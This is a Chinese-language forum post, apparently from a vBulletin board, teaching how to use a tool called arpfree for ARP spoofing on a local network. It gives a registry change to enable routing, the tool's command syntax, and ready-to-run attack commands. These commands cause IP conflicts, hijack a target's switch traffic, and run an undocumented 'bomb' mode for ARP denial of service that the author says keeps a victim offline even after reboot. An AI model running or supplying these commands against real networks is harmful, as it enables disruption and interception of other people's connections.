教你讓內網任何一台電腦死機
教你讓內網任何一台電腦死機
開始忘記說了,要使用ARP欺騙,必須啟動ip路由功能,修改(新增)註冊表選項: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1 下面的朋友發現打開網卡失敗,原因可能就是這個. 發送的時候可以選擇ARP的TYPE。如果是ARP請求報文,則只要輸入要問的IP地址 如果是ARP應答報文則要輸入發送端的IP以及對方詢問MAC地址對應的IP地址 最後的發送速度可選參數為:(大小寫敏感..我覺得挺不好的) fast----------最快 hear---------每60MS一個包(可能是比較適合結合SNIFFER做監聽) slowhear---每500MS一個包 auto---------每1秒一個包 slow---------每2秒個包 使用方法如下: *********************************************************************** * (1)Send arp packet in "request mode" Examples: * arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast * | | | | | * your mac address | | | | * destnation mac | | speed * arp type | * | * your ip address *********************************************************************** * (2)Send arp packet in "reply mode" Examples: * arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto * | | | | | | * your mac address | | | | | * destnation mac | | | speed * arp type | | * | | * your ip address | * | * the ip address of destnation mac *********************************************************************** 補充:反擊「LAN終結者」的辦法: 反擊「終結者」有幾個辦法: 1:發動比他更強烈的攻擊: arpfree 123412341234 ffffffffffff request 192.168.237.58 fast | | 這裡是你想攻擊的人的IP地址 2:交換機競爭: arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast | | 這裡是你想攻擊的人的MAC地址 1:情況將導致他IP地址衝突(比「終結者」來的猛烈多了) 2:情況將使得他無法連接網路(由於交換機把他的流量都給你了) ———————————更-----新----消-----息————————————————————— 因為有朋友反映在非交換環境下,如使用HUB的情況下,無法對目標進行打擊 故於2006年4月5日更新附件「arpfree.rar」 增加參數「bomb」,使用方法如下: 假設,目標為IP:192.168.237.109 目標mac為:011a8575a436 攻擊命令如下: arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb 其實就是進行簡單的ARP DOS攻擊,快速重新整理目標的ARP快取記憶體,可以在消耗自身較少系統資源的情況下 造成和PDOS工具類似的效果,並且如果你不停止攻擊,對方重啟以後也無法正常進入系統 (當然前提是他沒拔網線)。 其實這樣做是十分不厚道的....所以參數就沒有寫在程式的 HELP 裡面,大家慎用... |
所有時間均為台北時間。現在的時間是 09:20 AM。 |
Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.
『服務條款』
* 有問題不知道該怎麼解決嗎?請聯絡本站的系統管理員 *